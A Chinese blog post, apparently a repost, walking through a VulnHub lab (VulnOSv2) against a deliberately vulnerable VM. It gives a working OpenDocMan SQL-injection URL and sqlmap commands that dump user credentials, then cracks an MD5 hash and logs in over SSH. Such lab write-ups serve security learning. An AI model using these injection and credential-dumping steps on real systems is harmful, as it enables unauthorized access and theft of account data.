首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

vulnhub之VulnOSv2的实践(一)

很久没做网络安全相关的实践了,利用十一假期把之前下载的VulnOSv2搞一下,

需要Virtualbox才能打开,我给了一个hostonly的网卡,

首先要解决的是靶机地址是啥,既然知道hostonly的网段,装一个kali,做个主机扫描就可以了,

试了一下100无法ping通,101可以,则猜测100是dhcp服务,101是靶机,

继续对靶机进行服务扫描,

http服务开着,那就访问一下试试,

访问进去,发现是OpenDocMan应用,

在网上搜这个版本号的漏洞,

能做SQL注入,真是太好了,

先手工注一下,http://192.168.56.101/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9,

然后用sqlmap自动注,先看有哪些数据库,sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --dbms MySQL 5.5.47 --dbs,

再看看jabcd0cs数据库里有哪些表,sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs --dbms MySQL 5.5.47 --tables,

再看看odm_user数据表里有哪些字段,sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user --dbms MySQL 5.5.47 --columns,

最后再看看username和password字段的详细内容,sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user -C "username,password" --dbms MySQL 5.5.47 --dump,

知道了webmin是一个用户,密码是md5的,需要破解一下,

访问http://md5decrypt.net/en/,

密码明文原来是webmin1980,

就可以远程ssh靶机了,

到这儿应该再继续实践提权,但是实践开始时忘了给访问公网的条件,留个尾巴,下次继续。

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20181007G1E2DO00?refer=cp_1026
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码

添加站长 进交流群

领取专属 10元无门槛券

私享最新 技术干货

扫码加入开发者社群
领券